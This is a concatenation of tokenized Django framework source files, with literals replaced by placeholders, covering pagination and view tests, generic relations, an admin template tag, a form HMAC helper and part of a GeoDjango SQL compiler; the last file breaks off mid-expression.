<NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) , <EOL> ( ( [ ] , <NUM_LIT:4> , <NUM_LIT:2> , True ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) , <EOL> ) <EOL> for params , first , last in tests : <EOL> self . check_indexes ( params , '<STR_LIT>' , first ) <EOL> self . check_indexes ( params , '<STR_LIT>' , last ) <EOL> self . assertRaises ( EmptyPage , self . check_indexes , ( [ ] , <NUM_LIT:4> , <NUM_LIT:0> , False ) , <NUM_LIT:1> , None ) <EOL> self . assertRaises ( EmptyPage , self . check_indexes , ( [ ] , <NUM_LIT:4> , <NUM_LIT:1> , False ) , <NUM_LIT:1> , None ) <EOL> self . assertRaises ( EmptyPage , self . check_indexes , ( [ ] , <NUM_LIT:4> , <NUM_LIT:2> , False ) , <NUM_LIT:1> , None ) <EOL> def test_page_sequence ( self ) : <EOL> """<STR_LIT>""" <EOL> eleven = '<STR_LIT>' <EOL> page2 = Paginator ( eleven , per_page = <NUM_LIT:5> , orphans = <NUM_LIT:1> ) . page ( <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( page2 ) , <NUM_LIT:6> ) <EOL> self . assertTrue ( '<STR_LIT:k>' in page2 ) <EOL> self . assertFalse ( '<STR_LIT:a>' in page2 ) <EOL> self . assertEqual ( '<STR_LIT>' . join ( page2 ) , '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' . join ( reversed ( page2 ) ) , '<STR_LIT>' ) </s>
<s> from datetime import datetime <EOL> from django . core . files import storage <EOL> class DummyStorage ( storage . Storage ) : <EOL> """<STR_LIT>""" <EOL> def _save ( self , name , content ) : <EOL> return '<STR_LIT>' <EOL> def delete ( self , name ) : <EOL> pass <EOL> def exists ( self , name ) : <EOL> pass <EOL> def modified_time ( self , name ) : <EOL> return datetime . date ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) </s>
<s> </s>
<s> from __future__ import absolute_import <EOL> from django . conf . urls import patterns <EOL> from . views import empty_view <EOL> urlpatterns = patterns ( '<STR_LIT>' ) <EOL> handler404 = empty_view <EOL> handler500 = empty_view </s>
<s> from __future__ import absolute_import <EOL> from django . test import TestCase <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from . . models import Author , Article , UrlArticle <EOL> class DefaultsTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> fixtures = [ '<STR_LIT>' ] <EOL> non_existing_urls = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def test_shortcut_with_absolute_url ( self ) : <EOL> "<STR_LIT>" <EOL> for obj in Author . objects . all ( ) : <EOL> short_url = '<STR_LIT>' % ( ContentType . objects . get_for_model ( Author ) . id , obj . pk ) <EOL> response = self . client . get ( short_url ) <EOL> self . assertRedirects ( response , '<STR_LIT>' % obj . get_absolute_url ( ) , <EOL> status_code = <NUM_LIT> , target_status_code = <NUM_LIT> ) <EOL> def test_shortcut_no_absolute_url ( self ) : <EOL> "<STR_LIT>" <EOL> for obj in Article . objects . all ( ) : <EOL> short_url = '<STR_LIT>' % ( ContentType . objects . get_for_model ( Article ) . id , obj . pk ) <EOL> response = self . client . get ( short_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_wrong_type_pk ( self ) : <EOL> short_url = '<STR_LIT>' % ( ContentType . objects . get_for_model ( Author ) . id , '<STR_LIT>' ) <EOL> response = self . client . get ( short_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_shortcut_bad_pk ( self ) : <EOL> short_url = '<STR_LIT>' % ( ContentType . objects . get_for_model ( Author ) . id , '<STR_LIT>' ) <EOL> response = self . client . get ( short_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_nonint_content_type ( self ) : <EOL> an_author = Author . objects . all ( ) [ <NUM_LIT:0> ] <EOL> short_url = '<STR_LIT>' % ( '<STR_LIT>' , an_author . pk ) <EOL> response = self . client . get ( short_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_bad_content_type ( self ) : <EOL> an_author = Author . objects . all ( ) [ <NUM_LIT:0> ] <EOL> short_url = '<STR_LIT>' % ( <NUM_LIT> , an_author . pk ) <EOL> response = self . client . get ( short_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_page_not_found ( self ) : <EOL> "<STR_LIT>" <EOL> for url in self . non_existing_urls : <EOL> response = self . client . get ( url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_csrf_token_in_404 ( self ) : <EOL> """<STR_LIT>""" <EOL> for url in self . non_existing_urls : <EOL> response = self . client . get ( url ) <EOL> csrf_token = response . context [ '<STR_LIT>' ] <EOL> self . assertNotEqual ( str ( csrf_token ) , '<STR_LIT>' ) <EOL> self . assertNotEqual ( str ( csrf_token ) , '<STR_LIT>' ) <EOL> def test_server_error ( self ) : <EOL> "<STR_LIT>" <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def test_get_absolute_url_attributes ( self ) : <EOL> "<STR_LIT>" <EOL> self . assertTrue ( getattr ( UrlArticle . get_absolute_url , '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' ) <EOL> article = UrlArticle . objects . get ( pk = <NUM_LIT:1> ) <EOL> self . assertTrue ( getattr ( article . get_absolute_url , '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' ) </s>
<s> from django import template <EOL> from django . contrib . admin . models import LogEntry <EOL> register = template . Library ( ) <EOL> class AdminLogNode ( template . Node ) : <EOL> def __init__ ( self , limit , varname , user ) : <EOL> self . limit , self . varname , self . user = limit , varname , user <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" <EOL> def render ( self , context ) : <EOL> if self . user is None : <EOL> context [ self . varname ] = LogEntry . objects . all ( ) . select_related ( '<STR_LIT>' , '<STR_LIT:user>' ) [ : self . limit ] <EOL> else : <EOL> user_id = self . user <EOL> if not user_id . isdigit ( ) : <EOL> user_id = context [ self . user ] . id <EOL> context [ self . varname ] = LogEntry . objects . filter ( user__id__exact = user_id ) . select_related ( '<STR_LIT>' , '<STR_LIT:user>' ) [ : int ( self . limit ) ] <EOL> return '<STR_LIT>' <EOL> @ register . tag <EOL> def get_admin_log ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> tokens = token . contents . split ( ) <EOL> if len ( tokens ) < <NUM_LIT:4> : <EOL> raise template . TemplateSyntaxError ( <EOL> "<STR_LIT>" ) <EOL> if not tokens [ <NUM_LIT:1> ] . isdigit ( ) : <EOL> raise template . TemplateSyntaxError ( <EOL> "<STR_LIT>" ) <EOL> if tokens [ <NUM_LIT:2> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError ( <EOL> "<STR_LIT>" ) <EOL> if len ( tokens ) > <NUM_LIT:4> : <EOL> if tokens [ <NUM_LIT:4> ] != '<STR_LIT>' : <EOL> raise template . TemplateSyntaxError ( <EOL> "<STR_LIT>" ) <EOL> return AdminLogNode ( limit = tokens [ <NUM_LIT:1> ] , varname = tokens [ <NUM_LIT:3> ] , user = ( len ( tokens ) > <NUM_LIT:5> and tokens [ <NUM_LIT:5> ] or None ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> from collections import defaultdict <EOL> from functools import partial <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from django . db import connection <EOL> from django . db . models import signals <EOL> from django . db import models , router , DEFAULT_DB_ALIAS <EOL> from django . db . models . fields . related import RelatedField , Field , ManyToManyRel <EOL> from django . db . models . loading import get_model <EOL> from django . forms import ModelForm <EOL> from django . forms . models import BaseModelFormSet , modelformset_factory , save_instance <EOL> from django . contrib . admin . options import InlineModelAdmin , flatten_fieldsets <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . utils . encoding import smart_text <EOL> class GenericForeignKey ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ct_field = "<STR_LIT>" , fk_field = "<STR_LIT>" ) : <EOL> self . ct_field = ct_field <EOL> self . fk_field = fk_field <EOL> def contribute_to_class ( self , cls , name ) : <EOL> self . name = name <EOL> self . model = cls <EOL> self . cache_attr = "<STR_LIT>" % name <EOL> cls . _meta . add_virtual_field ( self ) <EOL> signals . pre_init . connect ( self . instance_pre_init , sender = cls , weak = False ) <EOL> setattr ( cls , name , self ) <EOL> def instance_pre_init ( self , signal , sender , args , kwargs , ** _kwargs ) : <EOL> """<STR_LIT>""" <EOL> if self . name in kwargs : <EOL> value = kwargs . pop ( self . name ) <EOL> kwargs [ self . ct_field ] = self . get_content_type ( obj = value ) <EOL> kwargs [ self . fk_field ] = value . _get_pk_val ( ) <EOL> def get_content_type ( self , obj = None , id = None , using = None ) : <EOL> ContentType = get_model ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if obj : <EOL> return ContentType . objects . db_manager ( obj . _state . db ) . get_for_model ( obj ) <EOL> elif id : <EOL> return ContentType . objects . db_manager ( using ) . get_for_id ( id ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def get_prefetch_query_set ( self , instances ) : <EOL> fk_dict = defaultdict ( set ) <EOL> instance_dict = { } <EOL> ct_attname = self . model . _meta . get_field ( self . ct_field ) . get_attname ( ) <EOL> for instance in instances : <EOL> ct_id = getattr ( instance , ct_attname ) <EOL> if ct_id is not None : <EOL> fk_val = getattr ( instance , self . fk_field ) <EOL> if fk_val is not None : <EOL> fk_dict [ ct_id ] . add ( fk_val ) <EOL> instance_dict [ ct_id ] = instance <EOL> ret_val = [ ] <EOL> for ct_id , fkeys in fk_dict . items ( ) : <EOL> instance = instance_dict [ ct_id ] <EOL> ct = self . get_content_type ( id = ct_id , using = instance . _state . db ) <EOL> ret_val . extend ( ct . get_all_objects_for_this_type ( pk__in = fkeys ) ) <EOL> def gfk_key ( obj ) : <EOL> ct_id = getattr ( obj , ct_attname ) <EOL> if ct_id is None : <EOL> return None <EOL> else : <EOL> model = self . get_content_type ( id = ct_id , <EOL> using = obj . _state . db ) . model_class ( ) <EOL> return ( model . _meta . pk . get_prep_value ( getattr ( obj , self . fk_field ) ) , <EOL> model ) <EOL> return ( ret_val , <EOL> lambda obj : ( obj . _get_pk_val ( ) , obj . __class__ ) , <EOL> gfk_key , <EOL> True , <EOL> self . cache_attr ) <EOL> def is_cached ( self , instance ) : <EOL> return hasattr ( instance , self . cache_attr ) <EOL> def __get__ ( self , instance , instance_type = None ) : <EOL> if instance is None : <EOL> return self <EOL> try : <EOL> return getattr ( instance , self . cache_attr ) <EOL> except AttributeError : <EOL> rel_obj = None <EOL> f = self . model . _meta . get_field ( self . ct_field ) <EOL> ct_id = getattr ( instance , f . get_attname ( ) , None ) <EOL> if ct_id : <EOL> ct = self . get_content_type ( id = ct_id , using = instance . _state . db ) <EOL> try : <EOL> rel_obj = ct . get_object_for_this_type ( pk = getattr ( instance , self . fk_field ) ) <EOL> except ObjectDoesNotExist : <EOL> pass <EOL> setattr ( instance , self . cache_attr , rel_obj ) <EOL> return rel_obj <EOL> def __set__ ( self , instance , value ) : <EOL> if instance is None : <EOL> raise AttributeError ( "<STR_LIT>" % self . related . opts . object_name ) <EOL> ct = None <EOL> fk = None <EOL> if value is not None : <EOL> ct = self . get_content_type ( obj = value ) <EOL> fk = value . _get_pk_val ( ) <EOL> setattr ( instance , self . ct_field , ct ) <EOL> setattr ( instance , self . fk_field , fk ) <EOL> setattr ( instance , self . cache_attr , value ) <EOL> class GenericRelation ( RelatedField , Field ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , to , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = kwargs . get ( '<STR_LIT>' , None ) <EOL> kwargs [ '<STR_LIT>' ] = GenericRel ( to , <EOL> related_name = kwargs . pop ( '<STR_LIT:related_name>' , None ) , <EOL> limit_choices_to = kwargs . pop ( '<STR_LIT>' , None ) , <EOL> symmetrical = kwargs . pop ( '<STR_LIT>' , True ) ) <EOL> self . object_id_field_name = kwargs . pop ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . content_type_field_name = kwargs . pop ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> kwargs [ '<STR_LIT:blank>' ] = True <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> Field . __init__ ( self , ** kwargs ) <EOL> def get_choices_default ( self ) : <EOL> return Field . get_choices ( self , include_blank = False ) <EOL> def value_to_string ( self , obj ) : <EOL> qs = getattr ( obj , self . name ) . all ( ) <EOL> return smart_text ( [ instance . _get_pk_val ( ) for instance in qs ] ) <EOL> def m2m_db_table ( self ) : <EOL> return self . rel . to . _meta . db_table <EOL> def m2m_column_name ( self ) : <EOL> return self . object_id_field_name <EOL> def m2m_reverse_name ( self ) : <EOL> return self . rel . to . _meta . pk . column <EOL> def m2m_target_field_name ( self ) : <EOL> return self . model . _meta . pk . name <EOL> def m2m_reverse_target_field_name ( self ) : <EOL> return self . rel . to . _meta . pk . name <EOL> def contribute_to_class ( self , cls , name ) : <EOL> super ( GenericRelation , self ) . contribute_to_class ( cls , name ) <EOL> self . model = cls <EOL> setattr ( cls , self . name , ReverseGenericRelatedObjectsDescriptor ( self ) ) <EOL> def contribute_to_related_class ( self , cls , related ) : <EOL> pass <EOL> def set_attributes_from_rel ( self ) : <EOL> pass <EOL> def get_internal_type ( self ) : <EOL> return "<STR_LIT>" <EOL> def db_type ( self , connection ) : <EOL> return None <EOL> def extra_filters ( self , pieces , pos , negate ) : <EOL> """<STR_LIT>""" <EOL> if negate : <EOL> return [ ] <EOL> ContentType = get_model ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> content_type = ContentType . objects . get_for_model ( self . model ) <EOL> prefix = "<STR_LIT>" . join ( pieces [ : pos + <NUM_LIT:1> ] ) <EOL> return [ ( "<STR_LIT>" % ( prefix , self . content_type_field_name ) , <EOL> content_type ) ] <EOL> def bulk_related_objects ( self , objs , using = DEFAULT_DB_ALIAS ) : <EOL> """<STR_LIT>""" <EOL> return self . rel . to . _base_manager . db_manager ( using ) . filter ( ** { <EOL> "<STR_LIT>" % self . content_type_field_name : <EOL> ContentType . objects . db_manager ( using ) . get_for_model ( self . model ) . pk , <EOL> "<STR_LIT>" % self . object_id_field_name : <EOL> [ obj . pk for obj in objs ] <EOL> } ) <EOL> class ReverseGenericRelatedObjectsDescriptor ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , field ) : <EOL> self . field = field <EOL> def __get__ ( self , instance , instance_type = None ) : <EOL> if instance is None : <EOL> return self <EOL> from django . contrib . contenttypes . models import ContentType <EOL> rel_model = self . field . rel . to <EOL> superclass = rel_model . _default_manager . __class__ <EOL> RelatedManager = create_generic_related_manager ( superclass ) <EOL> qn = connection . ops . quote_name <EOL> content_type = ContentType . objects . db_manager ( instance . _state . db ) . get_for_model ( instance ) <EOL> manager = RelatedManager ( <EOL> model = rel_model , <EOL> instance = instance , <EOL> symmetrical = ( self . field . rel . symmetrical and instance . __class__ == rel_model ) , <EOL> source_col_name = qn ( self . field . m2m_column_name ( ) ) , <EOL> target_col_name = qn ( self . field . m2m_reverse_name ( ) ) , <EOL> content_type = content_type , <EOL> content_type_field_name = self . field . content_type_field_name , <EOL> object_id_field_name = self . field . object_id_field_name , <EOL> prefetch_cache_name = self . field . attname , <EOL> ) <EOL> return manager <EOL> def __set__ ( self , instance , value ) : <EOL> if instance is None : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> manager = self . __get__ ( instance ) <EOL> manager . clear ( ) <EOL> for obj in value : <EOL> manager . add ( obj ) <EOL> def create_generic_related_manager ( superclass ) : <EOL> """<STR_LIT>""" <EOL> class GenericRelatedObjectManager ( superclass ) : <EOL> def __init__ ( self , model = None , instance = None , symmetrical = None , <EOL> source_col_name = None , target_col_name = None , content_type = None , <EOL> content_type_field_name = None , object_id_field_name = None , <EOL> prefetch_cache_name = None ) : <EOL> super ( GenericRelatedObjectManager , self ) . __init__ ( ) <EOL> self . model = model <EOL> self . content_type = content_type <EOL> self . symmetrical = symmetrical <EOL> self . instance = instance <EOL> self . source_col_name = source_col_name <EOL> self . target_col_name = target_col_name <EOL> self . content_type_field_name = content_type_field_name <EOL> self . object_id_field_name = object_id_field_name <EOL> self . prefetch_cache_name = prefetch_cache_name <EOL> self . pk_val = self . instance . _get_pk_val ( ) <EOL> self . core_filters = { <EOL> '<STR_LIT>' % content_type_field_name : content_type . id , <EOL> '<STR_LIT>' % object_id_field_name : instance . _get_pk_val ( ) , <EOL> } <EOL> def get_query_set ( self ) : <EOL> try : <EOL> return self . instance . _prefetched_objects_cache [ self . prefetch_cache_name ] <EOL> except ( AttributeError , KeyError ) : <EOL> db = self . _db or router . db_for_read ( self . model , instance = self . instance ) <EOL> return super ( GenericRelatedObjectManager , self ) . get_query_set ( ) . using ( db ) . filter ( ** self . core_filters ) <EOL> def get_prefetch_query_set ( self , instances ) : <EOL> db = self . _db or router . db_for_read ( self . model , instance = instances [ <NUM_LIT:0> ] ) <EOL> query = { <EOL> '<STR_LIT>' % self . content_type_field_name : self . content_type . id , <EOL> '<STR_LIT>' % self . object_id_field_name : <EOL> set ( obj . _get_pk_val ( ) for obj in instances ) <EOL> } <EOL> qs = super ( GenericRelatedObjectManager , self ) . get_query_set ( ) . using ( db ) . filter ( ** query ) <EOL> object_id_converter = instances [ <NUM_LIT:0> ] . _meta . pk . to_python <EOL> return ( qs , <EOL> lambda relobj : object_id_converter ( getattr ( relobj , self . object_id_field_name ) ) , <EOL> lambda obj : obj . _get_pk_val ( ) , <EOL> False , <EOL> self . prefetch_cache_name ) <EOL> def add ( self , * objs ) : <EOL> for obj in objs : <EOL> if not isinstance ( obj , self . model ) : <EOL> raise TypeError ( "<STR_LIT>" % self . model . _meta . object_name ) <EOL> setattr ( obj , self . content_type_field_name , self . content_type ) <EOL> setattr ( obj , self . object_id_field_name , self . pk_val ) <EOL> obj . save ( ) <EOL> add . alters_data = True <EOL> def remove ( self , * objs ) : <EOL> db = router . db_for_write ( self . model , instance = self . instance ) <EOL> for obj in objs : <EOL> obj . delete ( using = db ) <EOL> remove . alters_data = True <EOL> def clear ( self ) : <EOL> db = router . db_for_write ( self . model , instance = self . instance ) <EOL> for obj in self . all ( ) : <EOL> obj . delete ( using = db ) <EOL> clear . alters_data = True <EOL> def create ( self , ** kwargs ) : <EOL> kwargs [ self . content_type_field_name ] = self . content_type <EOL> kwargs [ self . object_id_field_name ] = self . pk_val <EOL> db = router . db_for_write ( self . model , instance = self . instance ) <EOL> return super ( GenericRelatedObjectManager , self ) . using ( db ) . create ( ** kwargs ) <EOL> create . alters_data = True <EOL> return GenericRelatedObjectManager <EOL> class GenericRel ( ManyToManyRel ) : <EOL> def __init__ ( self , to , related_name = None , limit_choices_to = None , symmetrical = True ) : <EOL> self . to = to <EOL> self . related_name = related_name <EOL> self . limit_choices_to = limit_choices_to or { } <EOL> self . symmetrical = symmetrical <EOL> self . multiple = True <EOL> self . through = None <EOL> class BaseGenericInlineFormSet ( BaseModelFormSet ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data = None , files = None , instance = None , save_as_new = None , <EOL> prefix = None , queryset = None ) : <EOL> from django . contrib . contenttypes . models import ContentType <EOL> opts = self . model . _meta <EOL> self . instance = instance <EOL> self . rel_name = '<STR_LIT:->' . join ( ( <EOL> opts . app_label , opts . object_name . lower ( ) , <EOL> self . ct_field . name , self . ct_fk_field . name , <EOL> ) ) <EOL> if self . instance is None or self . instance . pk is None : <EOL> qs = self . model . _default_manager . none ( ) <EOL> else : <EOL> if queryset is None : <EOL> queryset = self . model . _default_manager <EOL> qs = queryset . filter ( ** { <EOL> self . ct_field . name : ContentType . objects . get_for_model ( self . instance ) , <EOL> self . ct_fk_field . name : self . instance . pk , <EOL> } ) <EOL> super ( BaseGenericInlineFormSet , self ) . __init__ ( <EOL> queryset = qs , data = data , files = files , <EOL> prefix = prefix <EOL> ) <EOL> @ classmethod <EOL> def get_default_prefix ( cls ) : <EOL> opts = cls . model . _meta <EOL> return '<STR_LIT:->' . join ( ( opts . app_label , opts . object_name . lower ( ) , <EOL> cls . ct_field . name , cls . ct_fk_field . name , <EOL> ) ) <EOL> def save_new ( self , form , commit = True ) : <EOL> from django . contrib . contenttypes . models import ContentType <EOL> kwargs = { <EOL> self . ct_field . get_attname ( ) : ContentType . objects . get_for_model ( self . instance ) . pk , <EOL> self . ct_fk_field . get_attname ( ) : self . instance . pk , <EOL> } <EOL> new_obj = self . model ( ** kwargs ) <EOL> return save_instance ( form , new_obj , commit = commit ) <EOL> def generic_inlineformset_factory ( model , form = ModelForm , <EOL> formset = BaseGenericInlineFormSet , <EOL> ct_field = "<STR_LIT>" , fk_field = "<STR_LIT>" , <EOL> fields = None , exclude = None , <EOL> extra = <NUM_LIT:3> , can_order = False , can_delete = True , <EOL> max_num = None , <EOL> formfield_callback = None ) : <EOL> """<STR_LIT>""" <EOL> opts = model . _meta <EOL> from django . contrib . contenttypes . models import ContentType <EOL> ct_field = opts . get_field ( ct_field ) <EOL> if not isinstance ( ct_field , models . ForeignKey ) or ct_field . rel . to != ContentType : <EOL> raise Exception ( "<STR_LIT>" % ct_field ) <EOL> fk_field = opts . get_field ( fk_field ) <EOL> if exclude is not None : <EOL> exclude = list ( exclude ) <EOL> exclude . extend ( [ ct_field . name , fk_field . name ] ) <EOL> else : <EOL> exclude = [ ct_field . name , fk_field . name ] <EOL> FormSet = modelformset_factory ( model , form = form , <EOL> formfield_callback = formfield_callback , <EOL> formset = formset , <EOL> extra = extra , can_delete = can_delete , can_order = can_order , <EOL> fields = fields , exclude = exclude , max_num = max_num ) <EOL> FormSet . ct_field = ct_field <EOL> FormSet . ct_fk_field = fk_field <EOL> return FormSet <EOL> class GenericInlineModelAdmin ( InlineModelAdmin ) : <EOL> ct_field = "<STR_LIT>" <EOL> ct_fk_field = "<STR_LIT>" <EOL> formset = BaseGenericInlineFormSet <EOL> def get_formset ( self , request , obj = None , ** kwargs ) : <EOL> if self . declared_fieldsets : <EOL> fields = flatten_fieldsets ( self . declared_fieldsets ) <EOL> else : <EOL> fields = None <EOL> if self . exclude is None : <EOL> exclude = [ ] <EOL> else : <EOL> exclude = list ( self . exclude ) <EOL> exclude . extend ( self . get_readonly_fields ( request , obj ) ) <EOL> if self . exclude is None and hasattr ( self . form , '<STR_LIT>' ) and self . form . _meta . exclude : <EOL> exclude . extend ( self . form . _meta . exclude ) <EOL> exclude = exclude or None <EOL> can_delete = self . can_delete and self . has_delete_permission ( request , obj ) <EOL> defaults = { <EOL> "<STR_LIT>" : self . ct_field , <EOL> "<STR_LIT>" : self . ct_fk_field , <EOL> "<STR_LIT>" : self . form , <EOL> "<STR_LIT>" : partial ( self . formfield_for_dbfield , request = request ) , <EOL> "<STR_LIT>" : self . formset , <EOL> "<STR_LIT>" : self . extra , <EOL> "<STR_LIT>" : can_delete , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : fields , <EOL> "<STR_LIT>" : self . max_num , <EOL> "<STR_LIT>" : exclude <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return generic_inlineformset_factory ( self . model , ** defaults ) <EOL> class GenericStackedInline ( GenericInlineModelAdmin ) : <EOL> template = '<STR_LIT>' <EOL> class GenericTabularInline ( GenericInlineModelAdmin ) : <EOL> template = '<STR_LIT>' </s>
<s> from __future__ import unicode_literals <EOL> import pickle <EOL> from django . utils . crypto import salted_hmac <EOL> from django . utils import six <EOL> def form_hmac ( form ) : <EOL> """<STR_LIT>""" <EOL> data = [ ] <EOL> for bf in form : <EOL> if form . empty_permitted and not form . has_changed ( ) : <EOL> value = bf . data or '<STR_LIT>' <EOL> else : <EOL> value = bf . field . clean ( bf . data ) or '<STR_LIT>' <EOL> if isinstance ( value , six . string_types ) : <EOL> value = value . strip ( ) <EOL> data . append ( ( bf . name , value ) ) <EOL> pickled = pickle . dumps ( data , pickle . HIGHEST_PROTOCOL ) <EOL> key_salt = '<STR_LIT>' <EOL> return salted_hmac ( key_salt , pickled ) . hexdigest ( ) </s>
<s> try : <EOL> from itertools import zip_longest <EOL> except ImportError : <EOL> from itertools import izip_longest as zip_longest <EOL> from django . utils . six . moves import zip <EOL> from django . db . backends . util import truncate_name , typecast_timestamp <EOL> from django . db . models . sql import compiler <EOL> from django . db . models . sql . constants import MULTI <EOL> from django . utils import six <EOL> SQLCompiler = compiler . SQLCompiler <EOL> class GeoSQLCompiler ( compiler . SQLCompiler ) : <EOL> def get_columns ( self , with_aliases = False ) : <EOL> """<STR_LIT>""" <EOL> qn = self . quote_name_unless_alias <EOL> qn2 = self . connection . ops . quote_name <EOL> result = [ '<STR_LIT>' % ( self . get_extra_select_format ( alias ) % col [ <NUM_LIT:0> ] , qn2 ( alias ) ) <EOL> for alias , col in six . iteritems ( self . query . extra_select ) ] <EOL> aliases = set ( self . query . extra_select . keys ( ) ) <EOL> if with_aliases : <EOL> col_aliases = aliases . copy ( ) <EOL> else : <EOL> col_aliases = set ( ) <EOL> if self . query . select : <EOL> only_load = self . deferred_to_columns ( ) <EOL> for col , field in zip ( self . query . select , self . query . select_fields ) : <EOL> if isinstance ( col , ( list , tuple ) ) : <EOL> alias , column = col <EOL> table = self . query . alias_map [ alias ] . table_name <EOL> if table in only_load and column not in only_load [ table ] : <EOL> continue <EOL> r = self . get_field_select ( field , alias , column ) <EOL> if with_aliases : <EOL> if col [ <NUM_LIT:1> ] in col_aliases : <EOL> c_alias = '<STR_LIT>' % len ( col_aliases ) <EOL> result . append ( '<STR_LIT>' % ( r , c_alias ) ) <EOL> aliases . add ( c_alias ) <EOL> col_aliases . add ( c_alias ) <EOL> else : <EOL> result . append ( '<STR_LIT>' % ( r , qn2 ( col [ <NUM_LIT:1> ] ) ) ) <EOL> aliases . add ( r ) <EOL> col_aliases . add ( col [ <NUM_LIT:1> ] ) <EOL> else : <EOL> result . append ( r ) <EOL> aliases . add ( r ) <EOL> col_aliases . add ( col [ <NUM_LIT:1> ] ) <EOL> else : <EOL> result . append ( col . as_sql ( qn , self . connection ) ) <EOL> if hasattr ( col , '<STR_LIT>' ) : <EOL> aliases . add ( col . alias ) <EOL> col_aliases . add ( col . alias ) <EOL> elif self . query . default_cols : <EOL> cols , new_aliases = self . get_default_columns ( with_aliases , <EOL> col_aliases ) <EOL> result . extend ( cols ) <EOL> aliases . update ( new_aliases ) <EOL> max_name_length = self . connection . ops . max_name_length ( ) <EOL> result . extend ( [ <EOL> '<STR_LIT>' % ( <EOL> self . get_extra_select_format ( alias ) % aggregate . as_sql ( qn , self . connection ) , <EOL> alias is not None <EOL> and '<STR_LIT>' % qn ( truncate_name ( alias , max_name_length ) ) <EOL> or '<STR_LIT>' <EOL> ) <EOL> for alias , aggregate in self . query . aggregate_select . items ( ) <EOL> ] ) <EOL> for ( table , col ) , field in zip ( self . query . related_select_cols , self . query . related_select_fields ) : <EOL> r = self . get_field_select ( field , table , col ) <EOL> if with_aliases and col in col_aliases : <EOL> c_alias = '<STR_LIT>' % len ( col_aliases ) <EOL> result . append ( '<STR_LIT>' % ( r , c_alias ) ) <EOL> aliases . add ( c_alias ) <EOL> col_aliases . add ( c_alias ) <EOL> else : <EOL> result . append ( r ) <EOL> aliases . add ( r ) <EOL> col_aliases . add ( col ) <EOL> self . _select_aliases = aliases <EOL> return result <EOL> def get_default_columns ( self , with_aliases = False , col_aliases = None , <EOL> start_alias = None , opts = None , as_pairs = False , local_only = False ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> if opts is None : <EOL> opts = self . query . model . _meta <EOL> aliases = set ( ) <EOL> only_load = self . deferred_to_columns ( ) <EOL> if start_alias : <EOL> seen = { None : start_alias } <EOL> for field , model in opts . get_fields_with_model ( ) : <EOL> if model == opts . concrete_model : <EOL> model = None <EOL> if local_only and model is not None : <EOL> continue <EOL> if start_alias : <EOL> try : <EOL> alias = seen [ model ] <EOL> except KeyError : <EOL> link_field = opts . get_ancestor_link ( model ) <EOL> alias = self . query . join ( ( start_alias , model . _meta . db_table , <EOL> link_field . column , model . _meta . pk . column ) ) <EOL> seen [ model ] = alias <EOL> else : <EOL> alias = self . query . included_inherited_models [ model ] <EOL> table = self . query . alias_map [ alias ] . table_name <EOL> if table in only_load and field . column not in only_load [ table ] : <EOL> continue <EOL> if as_pairs : <EOL> result . append ( ( alias , field . column ) ) <EOL> aliases . add ( alias ) <EOL> continue <EOL> field_sel = self . get_field_select ( field , alias ) <EOL> if with_aliases and field . column in col_aliases : <EOL> c_alias = '<STR_LIT>' % len ( col_aliases ) <EOL> result . append ( '<STR_LIT>' % ( field_sel , c_alias ) ) <EOL> col_aliases . add ( c_alias ) <EOL> aliases . add ( c_alias ) <EOL> else : <EOL> r = field_sel <EOL> result . append ( r ) <EOL> aliases . add ( r ) <EOL> if with_aliases : <EOL> col_aliases . add ( field . column ) <EOL> return result , aliases <EOL> def resolve_columns ( self , row , fields = ( ) ) : <EOL> """<STR_LIT>""" <EOL> values = [ ] <EOL> aliases = list ( self . query . extra_select ) <EOL> rn_offset = <NUM_LIT:0> <EOL> if self . connection . ops . oracle : <EOL> if self . query . high_mark is not None or self . query . low_mark : rn_offset = <NUM_LIT:1> <EOL> index_start = rn_offset + len ( aliases ) <EOL> values = [ self . query . convert_values ( v , <EOL> self . query . extra_select_fields . get ( a , None ) , <EOL> self . connection ) <EOL> for v , a in zip ( row [ rn_offset : index_start ] , aliases ) ] <EOL> if self . connection . ops . oracle or getattr ( self . query , '<STR_LIT>' , False ) : <EOL> for value , field in zip_longest ( 